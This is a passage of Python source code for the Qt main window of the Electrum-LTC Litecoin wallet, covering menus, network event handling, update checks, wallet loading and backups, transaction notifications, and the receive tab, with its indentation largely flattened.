wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum-LTC - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'channels_updated':
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
            t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker and wallet.network:
wallet.network.trigger_callback('channels_updated', wallet)
self.need_update.set()
        # Once the GUI has been initialized, check whether anything needs to be
        # announced, since callbacks may have fired before the GUI existed.
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
        except Exception:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-LTC Testnet" if constants.net.TESTNET else "Electrum-LTC"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend litecoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request litecoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_lightning_backup(self):
if self.wallet.is_lightning_backup():
msg = '\n\n'.join([
_("This file is a backup of a lightning wallet."),
_("You will not be able to perform lightning payments using this file, and the lightning balance displayed in this wallet might be outdated.") + ' ' + \
_("If you have lost the original wallet file, you can use this file to trigger a forced closure of your channels."),
_("Do you want to have your channels force-closed?")
])
if self.question(msg, title=_('Lightning Backup')):
self.network.maybe_init_lightning()
self.wallet.lnworker.start_network(self.network)
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Litecoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
        except Exception:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
if self.wallet.has_lightning():
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
        # "Settings"/"Preferences" are reserved menu names on macOS; use a different label as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum-ltc.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('litecoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-LTC",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Litecoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Litecoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-LTC - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-LTC", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-LTC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter="",
*, default_extension: str = None,
default_filter: str = None) -> Optional[str]:
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(self, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
if selected_path and directory != os.path.dirname(selected_path):
self.config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Litecoin addresses.'),
_('The Litecoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('On-chain'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
